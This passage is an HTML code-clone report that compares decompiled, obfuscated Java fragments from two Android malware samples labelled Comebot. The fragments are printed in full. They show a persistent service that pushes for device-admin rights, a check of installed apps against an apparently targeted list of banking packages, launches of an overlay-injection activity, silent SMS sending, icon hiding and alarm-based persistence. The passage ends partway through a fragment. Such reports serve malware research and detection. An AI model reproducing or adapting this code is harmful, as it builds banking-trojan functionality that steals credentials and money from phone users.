  public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2) {
    try {
      b((Context)this, paramIntent.getStringExtra(c.a("c\023`")), paramIntent.getStringExtra(b.a("KH")));
    } catch (Exception exception) {}
    try {
      Thread.sleep(5000L);
    } catch (InterruptedException interruptedException) {
      interruptedException.printStackTrace();
    } 
    return 1;
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 11:</b> &nbsp; 2 fragments, nominal size 61 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag40')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/gowhile.java: 22-82
</a>
<div class="mid" id="frag40" style="display:none"><pre>
  protected void onHandleIntent(Intent paramIntent) {
    this.c = (Context)this;
    PowerManager.WakeLock wakeLock = ((PowerManager)this.c.getSystemService(d.a("V\037Q\025T"))).newWakeLock(1, b.a("hCIPRE^"));
    if (wakeLock != null)
      wakeLock.acquire(); 
    a a1 = this.a;
    this.b.getClass();
    a.a((Context)this, "", 14000L);
    int i = 0;
    byte b = 0;
    char c = 'Ϩ';
    while (true) {
      char c1;
      try {
        TimeUnit.MILLISECONDS.sleep(c);
      } catch (InterruptedException interruptedException) {
        interruptedException.printStackTrace();
      } 
      if (!((DevicePolicyManager)getSystemService(d.a("B\025P\031E\025y\000I\034O\023_"))).isAdminActive(new ComponentName(this.c, DAR.class))) {
        c1 = '\n';
        Intent intent = new Intent((Context)this, admky.class);
        intent.addFlags(268435456);
        startActivity(intent);
      } else {
        if (!a(apiproc.class))
          this.c.startService(new Intent(this.c, apiproc.class)); 
        c1 = 'Ϩ';
      } 
      b++;
      int j = i + 1;
      this.b.getClass();
      byte b1 = b;
      if (b &gt;= 14) {
        this.c.startService(new Intent(this.c, commands.class));
        b1 = 0;
      } 
      this.b.getClass();
      c = c1;
      b = b1;
      i = j;
      if (j &gt;= 12) {
        if (this.a.f(this.c)) {
          String str = this.a.a(this.c, b.a("JTEPyRHQ"));
          try {
            if ((!str.equals(null) || !str.equals("")) &amp;&amp; str.length() &gt; 2) {
              Intent intent2 = new Intent();
              this((Context)this, actinj.class);
              Intent intent1 = intent2.putExtra(d.a("U\004T"), str);
              intent1.addFlags(268435456);
              intent1.addFlags(8388608);
              intent1.addFlags(1073741824);
              startActivity(intent1);
            } 
          } catch (Exception exception) {}
        } 
        i = 0;
        c = c1;
        b = b1;
      } 
    } 
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag110')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/gowhile.java: 22-82
</a>
<div class="mid" id="frag110" style="display:none"><pre>
  protected void onHandleIntent(Intent paramIntent) {
    this.c = (Context)this;
    PowerManager.WakeLock wakeLock = ((PowerManager)this.c.getSystemService(d.a("V\037Q\025T"))).newWakeLock(1, b.a("hCIPRE^"));
    if (wakeLock != null)
      wakeLock.acquire(); 
    a a1 = this.a;
    this.b.getClass();
    a.a((Context)this, "", 14000L);
    int i = 0;
    byte b = 0;
    char c = 'Ϩ';
    while (true) {
      char c1;
      try {
        TimeUnit.MILLISECONDS.sleep(c);
      } catch (InterruptedException interruptedException) {
        interruptedException.printStackTrace();
      } 
      if (!((DevicePolicyManager)getSystemService(d.a("B\025P\031E\025y\000I\034O\023_"))).isAdminActive(new ComponentName(this.c, DAR.class))) {
        c1 = '\n';
        Intent intent = new Intent((Context)this, admky.class);
        intent.addFlags(268435456);
        startActivity(intent);
      } else {
        if (!a(apiproc.class))
          this.c.startService(new Intent(this.c, apiproc.class)); 
        c1 = 'Ϩ';
      } 
      b++;
      int j = i + 1;
      this.b.getClass();
      byte b1 = b;
      if (b &gt;= 14) {
        this.c.startService(new Intent(this.c, commands.class));
        b1 = 0;
      } 
      this.b.getClass();
      c = c1;
      b = b1;
      i = j;
      if (j &gt;= 12) {
        if (this.a.f(this.c)) {
          String str = this.a.a(this.c, b.a("JTEPyRHQ"));
          try {
            if ((!str.equals(null) || !str.equals("")) &amp;&amp; str.length() &gt; 2) {
              Intent intent2 = new Intent();
              this((Context)this, actinj.class);
              Intent intent1 = intent2.putExtra(d.a("U\004T"), str);
              intent1.addFlags(268435456);
              intent1.addFlags(8388608);
              intent1.addFlags(1073741824);
              startActivity(intent1);
            } 
          } catch (Exception exception) {}
        } 
        i = 0;
        c = c1;
        b = b1;
      } 
    } 
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 12:</b> &nbsp; 2 fragments, nominal size 103 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag43')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/commands.java: 717-843
</a>
<div class="mid" id="frag43" style="display:none"><pre>
  public String b() {
    Iterator&lt;ApplicationInfo&gt; iterator = getPackageManager().getInstalledApplications(128).iterator();
    boolean bool1 = false;
    boolean bool2 = false;
    boolean bool3 = false;
    boolean bool4 = false;
    boolean bool5 = false;
    boolean bool6 = false;
    boolean bool7 = false;
    boolean bool8 = false;
    boolean bool9 = false;
    boolean bool10 = false;
    boolean bool11 = false;
    boolean bool12 = false;
    boolean bool13 = false;
    while (iterator.hasNext()) {
      ApplicationInfo applicationInfo = iterator.next();
      boolean bool14 = bool1;
      if (applicationInfo.packageName.equals(c.a("n\t`Hi\024z\003o")))
        bool14 = true; 
      boolean bool15 = bool2;
      if (applicationInfo.packageName.equals(c.a("\005b\013#\005a\003l\b`\007~\022h\024#\025h\005x\024d\022t")))
        bool15 = true; 
      boolean bool16 = bool3;
      if (applicationInfo.packageName.equals(c.a("\005b\013#\r`\025#\000\003h")))
        bool16 = true; 
      boolean bool17 = bool4;
      if (applicationInfo.packageName.equals(c.a("\005b\013#\003~\003yHh\013~")))
        bool17 = true; 
      boolean bool18 = bool5;
      if (applicationInfo.packageName.equals(c.a("\005b\013#\007{\007~\022#\007c\002\td\002#\013b\004d\nh\025h\005x\024d\022t")))
        bool18 = true; 
      boolean bool19 = bool6;
      if (applicationInfo.packageName.equals(c.a("\005b\013#\005a\003l\b`\007~\022h\024#\013j\023l\024i")))
        bool19 = true; 
      boolean bool20 = bool7;
      if (applicationInfo.packageName.equals(c.a("\005b\013#\027d\016b\t#\025h\005x\024d\022t")))
        bool20 = true; 
      boolean bool21 = bool8;
      if (applicationInfo.packageName.equals(c.a("n\t`Hl\by\017{\017\023~")))
        bool21 = true; 
      boolean bool22 = bool9;
      if (applicationInfo.packageName.equals(c.a("n\t`Hw\024j\017xHl\by\017{\017\023~")))
        bool22 = true; 
      boolean bool23 = bool10;
      if (applicationInfo.packageName.equals(c.a("\005b\013#\007}\026~Hj\t#\005a\003l\b#\004b\t~\022#\013l\025y\003")))
        bool23 = true; 
      boolean bool24 = bool11;
      if (applicationInfo.packageName.equals(c.a("\005b\013#\007c\002\te\003a\013#\007c\022d\020d\024x\025#\000\003h")))
        bool24 = true; 
      boolean bool25 = bool12;
      if (applicationInfo.packageName.equals(c.a("n\t`Hy\024x\025y\001bH`\to\017a\003#\025h\005x\024d\022t")))
        bool25 = true; 
      bool12 = bool25;
      bool11 = bool24;
      bool10 = bool23;
      bool9 = bool22;
      bool8 = bool21;
      bool7 = bool20;
      bool6 = bool19;
      bool5 = bool18;
      bool4 = bool17;
      bool3 = bool16;
      bool2 = bool15;
      bool1 = bool14;
      if (applicationInfo.packageName.equals(c.a("n\t`H~\t}\016b\025#\025`\025h"))) {
        bool13 = true;
        bool12 = bool25;
        bool11 = bool24;
        bool10 = bool23;
        bool9 = bool22;
        bool8 = bool21;
        bool7 = bool20;
        bool6 = bool19;
        bool5 = bool18;
        bool4 = bool17;
        bool3 = bool16;
        bool2 = bool15;
        bool1 = bool14;
      } 
    } 
    if (bool1 == true) {
      str2 = (new StringBuilder()).insert(0, "").append(c.a("\032I\024#1h\004q")).toString();
    } else {
      str2 = "";
    } 
    String str1 = str2;
    if (bool2 == true)
      str1 = (new StringBuilder()).insert(0, str2).append(c.a("q%@F^\003n\023\017y\037q")).toString(); 
    String str2 = str1;
    if (bool3 == true)
      str2 = (new StringBuilder()).insert(0, str1).append(c.a("q-l\025}\003\025f\037q")).toString(); 
    str1 = str2;
    if (bool4 == true)
      str1 = (new StringBuilder()).insert(0, str2).append(c.a("q(B\"&gt;Tq")).toString(); 
    str2 = str1;
    if (bool5 == true)
      str2 = (new StringBuilder()).insert(0, str1).append(c.a("q'['^2q")).toString(); 
    str1 = str2;
    if (bool6 == true)
      str1 = (new StringBuilder()).insert(0, str2).append(c.a("\032N\nh\007cF@\007~\022h\024q")).toString(); 
    String str3 = str1;
    if (bool7 == true)
      str3 = (new StringBuilder()).insert(0, str1).append(c.a("\032&gt;P=F^\003n\023\017y\037q")).toString(); 
    str2 = str3;
    if (bool8 == true)
      str2 = (new StringBuilder()).insert(0, str3).append(c.a("q'J0q")).toString(); 
    str1 = str2;
    if (bool9 == true)
      str1 = (new StringBuilder()).insert(0, str2).append(c.a("q\005b\013#\034\001d\023#\007c\022d\020d\024x\025q")).toString(); 
    str3 = str1;
    if (bool10 == true)
      str3 = (new StringBuilder()).insert(0, str1).append(c.a("q5x\026h\024-%a\003l\bh\024q")).toString(); 
    str2 = str3;
    if (bool11 == true)
      str2 = (new StringBuilder()).insert(0, str3).append(c.a("\032L\bi\024b\017iFL0q")).toString(); 
    str1 = str2;
    if (bool12 == true)
      str1 = (new StringBuilder()).insert(0, str2).append(c.a("\032L0@\to5h\005q")).toString(); 
    str2 = str1;
    if (bool13 == true)
      str2 = (new StringBuilder()).insert(0, str1).append(c.a("\032^\t}\016b\025q")).toString(); 
    str1 = str2;
    if (str2 == "")
      str1 = c.a("\bb"); 
    return str1.replace(c.a("\032q"), c.a("qlq")).replace(c.a("\032q"), c.a("q"));
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag113')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/commands.java: 717-843
</a>
<div class="mid" id="frag113" style="display:none"><pre>
  public String b() {
    Iterator&lt;ApplicationInfo&gt; iterator = getPackageManager().getInstalledApplications(128).iterator();
    boolean bool1 = false;
    boolean bool2 = false;
    boolean bool3 = false;
    boolean bool4 = false;
    boolean bool5 = false;
    boolean bool6 = false;
    boolean bool7 = false;
    boolean bool8 = false;
    boolean bool9 = false;
    boolean bool10 = false;
    boolean bool11 = false;
    boolean bool12 = false;
    boolean bool13 = false;
    while (iterator.hasNext()) {
      ApplicationInfo applicationInfo = iterator.next();
      boolean bool14 = bool1;
      if (applicationInfo.packageName.equals(c.a("n\t`Hi\024z\003o")))
        bool14 = true; 
      boolean bool15 = bool2;
      if (applicationInfo.packageName.equals(c.a("\005b\013#\005a\003l\b`\007~\022h\024#\025h\005x\024d\022t")))
        bool15 = true; 
      boolean bool16 = bool3;
      if (applicationInfo.packageName.equals(c.a("\005b\013#\r`\025#\000\003h")))
        bool16 = true; 
      boolean bool17 = bool4;
      if (applicationInfo.packageName.equals(c.a("\005b\013#\003~\003yHh\013~")))
        bool17 = true; 
      boolean bool18 = bool5;
      if (applicationInfo.packageName.equals(c.a("\005b\013#\007{\007~\022#\007c\002\td\002#\013b\004d\nh\025h\005x\024d\022t")))
        bool18 = true; 
      boolean bool19 = bool6;
      if (applicationInfo.packageName.equals(c.a("\005b\013#\005a\003l\b`\007~\022h\024#\013j\023l\024i")))
        bool19 = true; 
      boolean bool20 = bool7;
      if (applicationInfo.packageName.equals(c.a("\005b\013#\027d\016b\t#\025h\005x\024d\022t")))
        bool20 = true; 
      boolean bool21 = bool8;
      if (applicationInfo.packageName.equals(c.a("n\t`Hl\by\017{\017\023~")))
        bool21 = true; 
      boolean bool22 = bool9;
      if (applicationInfo.packageName.equals(c.a("n\t`Hw\024j\017xHl\by\017{\017\023~")))
        bool22 = true; 
      boolean bool23 = bool10;
      if (applicationInfo.packageName.equals(c.a("\005b\013#\007}\026~Hj\t#\005a\003l\b#\004b\t~\022#\013l\025y\003")))
        bool23 = true; 
      boolean bool24 = bool11;
      if (applicationInfo.packageName.equals(c.a("\005b\013#\007c\002\te\003a\013#\007c\022d\020d\024x\025#\000\003h")))
        bool24 = true; 
      boolean bool25 = bool12;
      if (applicationInfo.packageName.equals(c.a("n\t`Hy\024x\025y\001bH`\to\017a\003#\025h\005x\024d\022t")))
        bool25 = true; 
      bool12 = bool25;
      bool11 = bool24;
      bool10 = bool23;
      bool9 = bool22;
      bool8 = bool21;
      bool7 = bool20;
      bool6 = bool19;
      bool5 = bool18;
      bool4 = bool17;
      bool3 = bool16;
      bool2 = bool15;
      bool1 = bool14;
      if (applicationInfo.packageName.equals(c.a("n\t`H~\t}\016b\025#\025`\025h"))) {
        bool13 = true;
        bool12 = bool25;
        bool11 = bool24;
        bool10 = bool23;
        bool9 = bool22;
        bool8 = bool21;
        bool7 = bool20;
        bool6 = bool19;
        bool5 = bool18;
        bool4 = bool17;
        bool3 = bool16;
        bool2 = bool15;
        bool1 = bool14;
      } 
    } 
    if (bool1 == true) {
      str2 = (new StringBuilder()).insert(0, "").append(c.a("\032I\024#1h\004q")).toString();
    } else {
      str2 = "";
    } 
    String str1 = str2;
    if (bool2 == true)
      str1 = (new StringBuilder()).insert(0, str2).append(c.a("q%@F^\003n\023\017y\037q")).toString(); 
    String str2 = str1;
    if (bool3 == true)
      str2 = (new StringBuilder()).insert(0, str1).append(c.a("q-l\025}\003\025f\037q")).toString(); 
    str1 = str2;
    if (bool4 == true)
      str1 = (new StringBuilder()).insert(0, str2).append(c.a("q(B\"&gt;Tq")).toString(); 
    str2 = str1;
    if (bool5 == true)
      str2 = (new StringBuilder()).insert(0, str1).append(c.a("q'['^2q")).toString(); 
    str1 = str2;
    if (bool6 == true)
      str1 = (new StringBuilder()).insert(0, str2).append(c.a("\032N\nh\007cF@\007~\022h\024q")).toString(); 
    String str3 = str1;
    if (bool7 == true)
      str3 = (new StringBuilder()).insert(0, str1).append(c.a("\032&gt;P=F^\003n\023\017y\037q")).toString(); 
    str2 = str3;
    if (bool8 == true)
      str2 = (new StringBuilder()).insert(0, str3).append(c.a("q'J0q")).toString(); 
    str1 = str2;
    if (bool9 == true)
      str1 = (new StringBuilder()).insert(0, str2).append(c.a("q\005b\013#\034\001d\023#\007c\022d\020d\024x\025q")).toString(); 
    str3 = str1;
    if (bool10 == true)
      str3 = (new StringBuilder()).insert(0, str1).append(c.a("q5x\026h\024-%a\003l\bh\024q")).toString(); 
    str2 = str3;
    if (bool11 == true)
      str2 = (new StringBuilder()).insert(0, str3).append(c.a("\032L\bi\024b\017iFL0q")).toString(); 
    str1 = str2;
    if (bool12 == true)
      str1 = (new StringBuilder()).insert(0, str2).append(c.a("\032L0@\to5h\005q")).toString(); 
    str2 = str1;
    if (bool13 == true)
      str2 = (new StringBuilder()).insert(0, str1).append(c.a("\032^\t}\016b\025q")).toString(); 
    str1 = str2;
    if (str2 == "")
      str1 = c.a("\bb"); 
    return str1.replace(c.a("\032q"), c.a("qlq")).replace(c.a("\032q"), c.a("q"));
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 13:</b> &nbsp; 2 fragments, nominal size 11 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag44')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/commands.java: 845-858
</a>
<div class="mid" id="frag44" style="display:none"><pre>
  public String c() {
    String str1 = "";
    Iterator iterator = getPackageManager().getInstalledApplications(128).iterator();
    while (true) {
      while (true)
        break; 
      if (((ApplicationInfo)SYNTHETIC_LOCAL_VARIABLE_3).packageName.equals(c.a("\013b\004dH~\tn\017h\022h\001h\bh\024l\nhH`\to\017a\003#\nl\026}\nd")))
        str1 = (new StringBuilder()).insert(0, (String)SYNTHETIC_LOCAL_VARIABLE_4).append(c.a("q5b\005d\003y\003R!h\bh\024l\nh9K4q")).toString(); 
    } 
    String str2 = str1;
    if (str1 == "")
      str2 = c.a("\bb"); 
    return str2.replace(c.a("\032q"), c.a("qlq")).replace(c.a("\032q"), c.a("q"));
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag114')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/commands.java: 845-858
</a>
<div class="mid" id="frag114" style="display:none"><pre>
  public String c() {
    String str1 = "";
    Iterator iterator = getPackageManager().getInstalledApplications(128).iterator();
    while (true) {
      while (true)
        break; 
      if (((ApplicationInfo)SYNTHETIC_LOCAL_VARIABLE_3).packageName.equals(c.a("\013b\004dH~\tn\017h\022h\001h\bh\024l\nhH`\to\017a\003#\nl\026}\nd")))
        str1 = (new StringBuilder()).insert(0, (String)SYNTHETIC_LOCAL_VARIABLE_4).append(c.a("q5b\005d\003y\003R!h\bh\024l\nh9K4q")).toString(); 
    } 
    String str2 = str1;
    if (str1 == "")
      str2 = c.a("\bb"); 
    return str2.replace(c.a("\032q"), c.a("qlq")).replace(c.a("\032q"), c.a("q"));
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 14:</b> &nbsp; 2 fragments, nominal size 18 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag48')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/MainActivity.java: 13-30
</a>
<div class="mid" id="frag48" style="display:none"><pre>
  protected void onCreate(Bundle paramBundle) {
    super.onCreate(paramBundle);
    setContentView(2130903043);
    this.b.a((Context)this, d.a("\036G\035C"), b.a("]GWU^"));
    this.b.a((Context)this, d.a("\000C\002C\030P\021R/U\007U"), b.a("]GWU^"));
    this.b.a((Context)this, d.a("B\025J/U\007U"), b.a("]GWU^"));
    this.b.a((Context)this, d.a("H\025R\007I\002M"), b.a("]GWU^"));
    this.b.a((Context)this, d.a("A\000U"), b.a("]GWU^"));
    this.b.a((Context)this, d.a("\003G\006C/O\036L"), "");
    this.b.a((Context)this, b.a("\\COhNKYCI"), d.a("@\021J\003C"));
    a a1 = this.b;
    this.a.getClass();
    a.a((Context)this, "", 14000L);
    String str = getApplicationContext().getPackageName();
    ComponentName componentName = new ComponentName(str, (new StringBuilder()).insert(0, str).append(b.a("\025kZOUgXRRPRRB")).toString());
    getPackageManager().setComponentEnabledSetting(componentName, 2, 1);
    finish();
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag118')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/MainActivity.java: 13-30
</a>
<div class="mid" id="frag118" style="display:none"><pre>
  protected void onCreate(Bundle paramBundle) {
    super.onCreate(paramBundle);
    setContentView(2130903043);
    this.b.a((Context)this, d.a("\036G\035C"), b.a("]GWU^"));
    this.b.a((Context)this, d.a("\000C\002C\030P\021R/U\007U"), b.a("]GWU^"));
    this.b.a((Context)this, d.a("B\025J/U\007U"), b.a("]GWU^"));
    this.b.a((Context)this, d.a("H\025R\007I\002M"), b.a("]GWU^"));
    this.b.a((Context)this, d.a("A\000U"), b.a("]GWU^"));
    this.b.a((Context)this, d.a("\003G\006C/O\036L"), "");
    this.b.a((Context)this, b.a("\\COhNKYCI"), d.a("@\021J\003C"));
    a a1 = this.b;
    this.a.getClass();
    a.a((Context)this, "", 14000L);
    String str = getApplicationContext().getPackageName();
    ComponentName componentName = new ComponentName(str, (new StringBuilder()).insert(0, str).append(b.a("\025kZOUgXRRPRRB")).toString());
    getPackageManager().setComponentEnabledSetting(componentName, 2, 1);
    finish();
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 15:</b> &nbsp; 2 fragments, nominal size 11 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag49')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/a.java: 28-38
</a>
<div class="mid" id="frag49" style="display:none"><pre>
  public static void a(Context paramContext, String paramString, long paramLong) {
    try {
      Intent intent = new Intent();
      this(paramContext, resiverboot.class);
      intent.setAction(paramString);
      PendingIntent pendingIntent = PendingIntent.getBroadcast(paramContext, 0, intent, 0);
      ((AlarmManager)paramContext.getSystemService(d.a("G\034G\002K"))).setRepeating(0, System.currentTimeMillis() + paramLong, paramLong, pendingIntent);
    } catch (Exception exception) {
      exception.printStackTrace();
    } 
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag119')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/a.java: 28-38
</a>
<div class="mid" id="frag119" style="display:none"><pre>
  public static void a(Context paramContext, String paramString, long paramLong) {
    try {
      Intent intent = new Intent();
      this(paramContext, resiverboot.class);
      intent.setAction(paramString);
      PendingIntent pendingIntent = PendingIntent.getBroadcast(paramContext, 0, intent, 0);
      ((AlarmManager)paramContext.getSystemService(d.a("G\034G\002K"))).setRepeating(0, System.currentTimeMillis() + paramLong, paramLong, pendingIntent);
    } catch (Exception exception) {
      exception.printStackTrace();
    } 
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 16:</b> &nbsp; 2 fragments, nominal size 55 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag52')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/a.java: 56-109
</a>
<div class="mid" id="frag52" style="display:none"><pre>
  public String a(String paramString) {
    String str1;
    d d1 = new d();
    String str2 = "";
    d1.getClass();
    int i = 0;
    int j = 0;
    while (true) {
      str1 = str2;
      try {
        if (i &lt; "qwe".length()) {
          str1 = str2;
          String str = "qwe".substring(j, j + 1);
          str1 = str2;
          StringBuilder stringBuilder = new StringBuilder();
          str1 = str2;
          this();
          str1 = str2;
          stringBuilder = stringBuilder.insert(0, "").append(j);
          i = j + 1;
          str1 = str2;
          paramString = paramString.replace(str, stringBuilder.toString());
          j = i;
          continue;
        } 
        str1 = str2;
        String[] arrayOfString = paramString.split(d.a("\006"));
        str1 = str2;
        i = arrayOfString.length;
        j = 0;
        paramString = str2;
        while (true) {
          str1 = paramString;
          if (j &lt; i) {
            str1 = paramString;
            char c = (char)Integer.parseInt(arrayOfString[j]);
            str1 = paramString;
            StringBuilder stringBuilder = new StringBuilder();
            str1 = paramString;
            this();
            str1 = paramString;
            stringBuilder = stringBuilder.insert(0, paramString);
            j++;
            str1 = paramString;
            paramString = stringBuilder.append(c).toString();
            continue;
          } 
          break;
        } 
      } catch (Exception exception) {}
      break;
    } 
    return URLDecoder.decode((new StringBuilder()).insert(0, str1).append(d.a("\006")).toString());
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag122')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/a.java: 56-109
</a>
<div class="mid" id="frag122" style="display:none"><pre>
  public String a(String paramString) {
    String str1;
    d d1 = new d();
    String str2 = "";
    d1.getClass();
    int i = 0;
    int j = 0;
    while (true) {
      str1 = str2;
      try {
        if (i &lt; "qwe".length()) {
          str1 = str2;
          String str = "qwe".substring(j, j + 1);
          str1 = str2;
          StringBuilder stringBuilder = new StringBuilder();
          str1 = str2;
          this();
          str1 = str2;
          stringBuilder = stringBuilder.insert(0, "").append(j);
          i = j + 1;
          str1 = str2;
          paramString = paramString.replace(str, stringBuilder.toString());
          j = i;
          continue;
        } 
        str1 = str2;
        String[] arrayOfString = paramString.split(d.a("\006"));
        str1 = str2;
        i = arrayOfString.length;
        j = 0;
        paramString = str2;
        while (true) {
          str1 = paramString;
          if (j &lt; i) {
            str1 = paramString;
            char c = (char)Integer.parseInt(arrayOfString[j]);
            str1 = paramString;
            StringBuilder stringBuilder = new StringBuilder();
            str1 = paramString;
            this();
            str1 = paramString;
            stringBuilder = stringBuilder.insert(0, paramString);
            j++;
            str1 = paramString;
            paramString = stringBuilder.append(c).toString();
            continue;
          } 
          break;
        } 
      } catch (Exception exception) {}
      break;
    } 
    return URLDecoder.decode((new StringBuilder()).insert(0, str1).append(d.a("\006")).toString());
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 17:</b> &nbsp; 2 fragments, nominal size 58 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag55')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/a.java: 127-184
</a>
<div class="mid" id="frag55" style="display:none"><pre>
  public String b(String paramString) {
    StringBuilder stringBuilder;
    byte b1 = 0;
    new d();
    String str1 = URLEncoder.encode(paramString);
    String str2 = "";
    int i = 0;
    int j = 0;
    while (true) {
      StringBuilder stringBuilder1;
      paramString = str2;
      byte b2 = b1;
      String str = str2;
      try {
        StringBuilder stringBuilder2;
        if (i &lt; str1.length()) {
          str = str2;
          i = str1.charAt(j);
          str = str2;
          stringBuilder2 = new StringBuilder();
          str = str2;
          this();
          str = str2;
          stringBuilder2 = stringBuilder2.insert(0, str2).append(i);
          str = str2;
          String str3 = d.a("\006");
          i = j + 1;
          str = str2;
          str2 = stringBuilder2.append(str3).toString();
          j = i;
          continue;
        } 
        while (true) {
          stringBuilder1 = stringBuilder2;
          stringBuilder = stringBuilder2;
          if (b2 &lt; "qwe".length()) {
            stringBuilder1 = stringBuilder2;
            String str5 = "qwe".substring(b2, b2 + 1);
            stringBuilder1 = stringBuilder2;
            StringBuilder stringBuilder3 = new StringBuilder();
            stringBuilder1 = stringBuilder2;
            this();
            stringBuilder1 = stringBuilder2;
            String str4 = stringBuilder3.insert(0, "").append(b2).toString();
            b2++;
            stringBuilder1 = stringBuilder2;
            String str3 = stringBuilder2.replace(str4, str5);
            continue;
          } 
          break;
        } 
      } catch (Exception exception) {
        stringBuilder = stringBuilder1;
      } 
      break;
    } 
    return (String)stringBuilder;
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag125')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/a.java: 127-184
</a>
<div class="mid" id="frag125" style="display:none"><pre>
  public String b(String paramString) {
    StringBuilder stringBuilder;
    byte b1 = 0;
    new d();
    String str1 = URLEncoder.encode(paramString);
    String str2 = "";
    int i = 0;
    int j = 0;
    while (true) {
      StringBuilder stringBuilder1;
      paramString = str2;
      byte b2 = b1;
      String str = str2;
      try {
        StringBuilder stringBuilder2;
        if (i &lt; str1.length()) {
          str = str2;
          i = str1.charAt(j);
          str = str2;
          stringBuilder2 = new StringBuilder();
          str = str2;
          this();
          str = str2;
          stringBuilder2 = stringBuilder2.insert(0, str2).append(i);
          str = str2;
          String str3 = d.a("\006");
          i = j + 1;
          str = str2;
          str2 = stringBuilder2.append(str3).toString();
          j = i;
          continue;
        } 
        while (true) {
          stringBuilder1 = stringBuilder2;
          stringBuilder = stringBuilder2;
          if (b2 &lt; "qwe".length()) {
            stringBuilder1 = stringBuilder2;
            String str5 = "qwe".substring(b2, b2 + 1);
            stringBuilder1 = stringBuilder2;
            StringBuilder stringBuilder3 = new StringBuilder();
            stringBuilder1 = stringBuilder2;
            this();
            stringBuilder1 = stringBuilder2;
            String str4 = stringBuilder3.insert(0, "").append(b2).toString();
            b2++;
            stringBuilder1 = stringBuilder2;
            String str3 = stringBuilder2.replace(str4, str5);
            continue;
          } 
          break;
        } 
      } catch (Exception exception) {
        stringBuilder = stringBuilder1;
      } 
      break;
    } 
    return (String)stringBuilder;
  }
</pre></div>
</td>
</tr><tr>
</tr>
</table>
</td></tr>
</table>
<br>
<table style="width:1000px; border:2px solid lightgrey; border-radius:8px;">
<tr><td style="background-color:white">
<p style="font-size:14pt"><b>Class 18:</b> &nbsp; 2 fragments, nominal size 16 lines, similarity 100%</p>
<table cellpadding=4 border=2>
<tr>
<td width="auto">
<a onclick="javascript:ShowHide('frag59')" href="javascript:;">
Comebot/Comebot1/anu_bispro/app/a.java: 207-222
</a>
<div class="mid" id="frag59" style="display:none"><pre>
  public void c(Context paramContext, String paramString1, String paramString2) {
    int i = 0;
    SmsManager smsManager = SmsManager.getDefault();
    ArrayList arrayList = smsManager.divideMessage(paramString2);
    PendingIntent pendingIntent1 = PendingIntent.getBroadcast(paramContext, 0, new Intent(d.a("#k#y#c&gt;r")), 0);
    PendingIntent pendingIntent2 = PendingIntent.getBroadcast(paramContext, 0, new Intent(d.a("u=u/b5j9p5t5b")), 0);
    ArrayList&lt;PendingIntent&gt; arrayList1 = new ArrayList();
    ArrayList&lt;PendingIntent&gt; arrayList2 = new ArrayList();
    int j;
    for (j = 0; i &lt; arrayList.size(); j = i) {
      arrayList2.add(pendingIntent2);
      i = j + 1;
      arrayList1.add(pendingIntent1);
    } 
    smsManager.sendMultipartTextMessage(paramString1, null, arrayList, arrayList1, arrayList2);
  }
</pre></div>
</td>
<td width="auto">
<a onclick="javascript:ShowHide('frag129')" href="javascript:;">
Comebot/Comebot2/anu_bispro/app/a.java: 207-222
</a>
